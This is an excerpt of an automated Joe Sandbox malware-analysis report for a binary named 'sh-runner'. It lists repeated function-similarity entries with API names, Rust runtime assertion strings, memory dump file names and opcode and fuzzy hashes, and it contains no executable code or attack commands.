                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCompleteInitOnce
                                                                      • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                      • API String ID: 622421136-3544120690
                                                                      • Opcode ID: 8f7ae1cc7c3d373884c9017de4c86b9173f1b479400807a83c12ee046cfc920e
                                                                      • Instruction ID: 668229c6aa73267eb81562606c5fd13c43b96d1821f04b904844c348cb0e2b8c
                                                                      • Opcode Fuzzy Hash: 8f7ae1cc7c3d373884c9017de4c86b9173f1b479400807a83c12ee046cfc920e
                                                                      • Instruction Fuzzy Hash: 0971C532A0479186E718EF68E8403ECB770FB45758FA48035EA4D43661DF3DE585CB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: abort$CaptureCloseContextErrorHandleLastObjectSingleUnwindWait
                                                                      • String ID: SystemTime
                                                                      • API String ID: 2659168121-2656138
                                                                      • Opcode ID: 05cc99c28346786777d0b7d17e9c6535537345cd89bd38ba16040cca04a3ed61
                                                                      • Instruction ID: d70287ad2fea296e6b3da8284bdc184e260d9e4d4c2cdc9152ccfba930141376
                                                                      • Opcode Fuzzy Hash: 05cc99c28346786777d0b7d17e9c6535537345cd89bd38ba16040cca04a3ed61
                                                                      • Instruction Fuzzy Hash: C4319F26F04A0299FB08BB69E8413FC6764EF49794F944135DE5C13BA9DF3CA186CB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: signal
                                                                      • String ID: CCG
                                                                      • API String ID: 1946981877-1584390748
                                                                      • Opcode ID: 382e44d18ca0bd6a33c73706964a02664b84bef3567954fdc5be9eec53e919d1
                                                                      • Instruction ID: eebac0f29457a9b75ed55a3fefa09849f0d4ef5bde0b822b83377eb0a44ab1ba
                                                                      • Opcode Fuzzy Hash: 382e44d18ca0bd6a33c73706964a02664b84bef3567954fdc5be9eec53e919d1
                                                                      • Instruction Fuzzy Hash: 5C215E21F0ED0A42FB6C36ADA9533F99281DF4D354F98443ECA1E823F5DD1CA8814A32
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: SetThreadDescription$kernel32
                                                                      • API String ID: 1646373207-1950310818
                                                                      • Opcode ID: b72f721979762e52428eef455a9ef1fe81a4105e4d188751f34c40cc1a778e0e
                                                                      • Instruction ID: 5fa9c738daf40ff215e5723996a05b2d8457e6bc4e280605501dde0486386f1f
                                                                      • Opcode Fuzzy Hash: b72f721979762e52428eef455a9ef1fe81a4105e4d188751f34c40cc1a778e0e
                                                                      • Instruction Fuzzy Hash: A8118465F19A4282FF2DBB6E9D403F4D251EF88BC4F889036DD0D47BAADE5CE5414A20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileFindLastNextmemcpy
                                                                      • String ID: .
                                                                      • API String ID: 3684451505-248832578
                                                                      • Opcode ID: d9e1823e202fd63e5097a96fa8076ebd8c355dd65ab2e01eae2bab921ffa5412
                                                                      • Instruction ID: 237387add3b12cd04daf664f6071e1644ad15d6b407e320a57a02ff7ce71bc14
                                                                      • Opcode Fuzzy Hash: d9e1823e202fd63e5097a96fa8076ebd8c355dd65ab2e01eae2bab921ffa5412
                                                                      • Instruction Fuzzy Hash: D711B216B28A0286FB65B678A8403F8A260EB84754FC45031DE89622D1DE7CE4C18724
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: SetThreadDescription$kernel32
                                                                      • API String ID: 1646373207-1950310818
                                                                      • Opcode ID: 9d98af57cb7f6c7cd1ed0284d0bea0d51cbf6c989ff939cb8e803f8eba04e7de
                                                                      • Instruction ID: 2fe04dd3d23c7fa84ac87b97d2dd90c29cafc7ec6054868a0096f36554c3ab4d
                                                                      • Opcode Fuzzy Hash: 9d98af57cb7f6c7cd1ed0284d0bea0d51cbf6c989ff939cb8e803f8eba04e7de
                                                                      • Instruction Fuzzy Hash: C8119661F1594282FB2DBB699D403F4D251EF88BC4F848035DD0D47BA9DE5CE5414B20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: GetTempPath2W$kernel32
                                                                      • API String ID: 1646373207-407914046
                                                                      • Opcode ID: 692419809c08872f70c7ab20a927c7a81e82b9fdef07110db430cab33fcee5b3
                                                                      • Instruction ID: 4bc0ebd65f286d9d2a80d85bf88e2cc4a0892110eeef333a635deec80273f5e3
                                                                      • Opcode Fuzzy Hash: 692419809c08872f70c7ab20a927c7a81e82b9fdef07110db430cab33fcee5b3
                                                                      • Instruction Fuzzy Hash: BBF05E11E0AA82D5FB1DA769AC000F4E690EF88390EC8443ADD8D027B9DE6CA9458A20
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: is_code_point_boundary(self, new_len), xrefs: 00007FF72BD08327
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: assertion failed: is_code_point_boundary(self, new_len)
                                                                      • API String ID: 3510742995-9383156
                                                                      • Opcode ID: 865f7bd252a8e5ea9300757f2581f44efe6acb517dea27171c525fc87d244e35
                                                                      • Instruction ID: ff050041c1ef5f32dde9791e056a2496fd9e77a8443946d02c072e0718467af8
                                                                      • Opcode Fuzzy Hash: 865f7bd252a8e5ea9300757f2581f44efe6acb517dea27171c525fc87d244e35
                                                                      • Instruction Fuzzy Hash: E7B1D752F08A8645FA19AB6A9C002FDA761FF55BC8F848831DE4D177A6DE3DF1818620
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$abort$CaptureContextUnwind
                                                                      • String ID:
                                                                      • API String ID: 2434310364-0
                                                                      • Opcode ID: e6e4b6c425bf33ef89f3fbf5109c147b163b7af8cfe7a1939f6f4eb98d6596d1
                                                                      • Instruction ID: 3986d4feafc3d44d0b87a0ed132f5eb0e47087a89acf6dc388f4ebbac1bde2e4
                                                                      • Opcode Fuzzy Hash: e6e4b6c425bf33ef89f3fbf5109c147b163b7af8cfe7a1939f6f4eb98d6596d1
                                                                      • Instruction Fuzzy Hash: 00116021A1844381FA0EFA79DC112FD9360EF85B80FD4AC31D91E4A6F2DE3DA581DA64
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$abort$CaptureContextUnwind
                                                                      • String ID:
                                                                      • API String ID: 2434310364-0
                                                                      • Opcode ID: dd6a2ee4e16ff2eddf31d770df4b0bc98426b889c6779ed1a36cb6aa39b7d2e5
                                                                      • Instruction ID: 84f428494a5cdc87ae875bc748076b3cc446f7533140cf992a3d068f74f4f79d
                                                                      • Opcode Fuzzy Hash: dd6a2ee4e16ff2eddf31d770df4b0bc98426b889c6779ed1a36cb6aa39b7d2e5
                                                                      • Instruction Fuzzy Hash: 17F0E111B0855341F90DFA6A9C113FD9650EF8AFC0FC49834EC6E4B7A7CD2EA5825B25
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: program path has no file name
                                                                      • API String ID: 3510742995-697003637
                                                                      • Opcode ID: a68755110dcd1bfccc73a3eed03bb660f4e085dde23da3dd5d5d09b39b40e36c
                                                                      • Instruction ID: 11b892e146682508c91ac1aa0dee6e8a5fec733c41b760859141cc7e5095e15a
                                                                      • Opcode Fuzzy Hash: a68755110dcd1bfccc73a3eed03bb660f4e085dde23da3dd5d5d09b39b40e36c
                                                                      • Instruction Fuzzy Hash: 17A1C362B0879286FF189B699C007EDA651FB04B98FC48531CD5C57BAADF7DE1828710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandleLastmemcpymemset
                                                                      • String ID: assertion failed: filled <= self.buf.init
                                                                      • API String ID: 3211292799-906094691
                                                                      • Opcode ID: 049283549ca690784369705e02f6b546d2a81ea62e0b8237ba077bf55714be05
                                                                      • Instruction ID: 17fc8748358d73e0ed8df64f2ebfdb22564569fba723c34abb7c1fb9d9ea4563
                                                                      • Opcode Fuzzy Hash: 049283549ca690784369705e02f6b546d2a81ea62e0b8237ba077bf55714be05
                                                                      • Instruction Fuzzy Hash: E9711862B09B4182EA0CEB6A9D003BAA750FF45BC8F844835DE9D477A5DF3CE095D720
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpymemset
                                                                      • String ID: assertion failed: filled <= self.buf.init
                                                                      • API String ID: 1297977491-906094691
                                                                      • Opcode ID: 020880ebbf3e5536c508f2b93f5e9482472d10ce66a5751a697a7e61c8158c60
                                                                      • Instruction ID: 5c263379943fc4d10b35e89603866c646f7036c753e57e9377c518364672e26c
                                                                      • Opcode Fuzzy Hash: 020880ebbf3e5536c508f2b93f5e9482472d10ce66a5751a697a7e61c8158c60
                                                                      • Instruction Fuzzy Hash: 4B511992B04B8542EA15AB2E99103FAD761EF48BD4F98C132DE5D47375DE3DE1C28310
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ErrorHandleLastmemcpy
                                                                      • String ID: assertion failed: filled <= self.buf.init
                                                                      • API String ID: 4037564346-906094691
                                                                      • Opcode ID: a4d6739ca7e60efa2ccbbf7675f3c40d8c078b6be79a0496134661200a6b8338
                                                                      • Instruction ID: 55357bbb0f8eba7877c0a19d6b073c85a245f54c59e00515c190169cdf99756c
                                                                      • Opcode Fuzzy Hash: a4d6739ca7e60efa2ccbbf7675f3c40d8c078b6be79a0496134661200a6b8338
                                                                      • Instruction Fuzzy Hash: 2E41E862B05B4156DE18EB2AED102A5E761FB48790F848836DF6E43B71DF3CF1E18210
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID: program path has no file name
                                                                      • API String ID: 2962429428-697003637
                                                                      • Opcode ID: 53e9b4ad406de20670141078e0d472c3f5fc7f28f65801387bdc58cd776c8606
                                                                      • Instruction ID: d381149ac5e6502471d961e0e0385692a9a6a5d7faaed3762b2a58f3686aee43
                                                                      • Opcode Fuzzy Hash: 53e9b4ad406de20670141078e0d472c3f5fc7f28f65801387bdc58cd776c8606
                                                                      • Instruction Fuzzy Hash: 75419766B1858285EB68BB6D9C003F99350EF89B94FC41436DE0D4B7A5DE39D5818B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$DirectorySystem
                                                                      • String ID:
                                                                      • API String ID: 860285823-0
                                                                      • Opcode ID: 91017c7d2519a45b9b1f236946f03773d418f02b60e1f79754b2fad199aa389c
                                                                      • Instruction ID: a8d185d241b62f372e775a11c80685c2ed81c51d767e7cc50c018112afdd599c
                                                                      • Opcode Fuzzy Hash: 91017c7d2519a45b9b1f236946f03773d418f02b60e1f79754b2fad199aa389c
                                                                      • Instruction Fuzzy Hash: 57412322A15EA144E778AE38DC043FAA280FB44759F801139DA5D8BBD9DF3CE5428B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$ObjectSingleSleepWait
                                                                      • String ID:
                                                                      • API String ID: 2593906732-0
                                                                      • Opcode ID: 0b830fd4423ef8efd6f3cb6563c7a5198bdecd6a9065a39ced86b85448b3e9b9
                                                                      • Instruction ID: 3324d856f3ba7a63e1125872ec28a2c6a2db45199731a61dbafa2879ef723805
                                                                      • Opcode Fuzzy Hash: 0b830fd4423ef8efd6f3cb6563c7a5198bdecd6a9065a39ced86b85448b3e9b9
                                                                      • Instruction Fuzzy Hash: 14213822F09A4206FF1CA66D7D217749146DFC93A0E8CA33AEE1E467F9DD3CB4814A10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: abort$CaptureContextExceptionRaiseUnwind
                                                                      • String ID:
                                                                      • API String ID: 4122134289-0
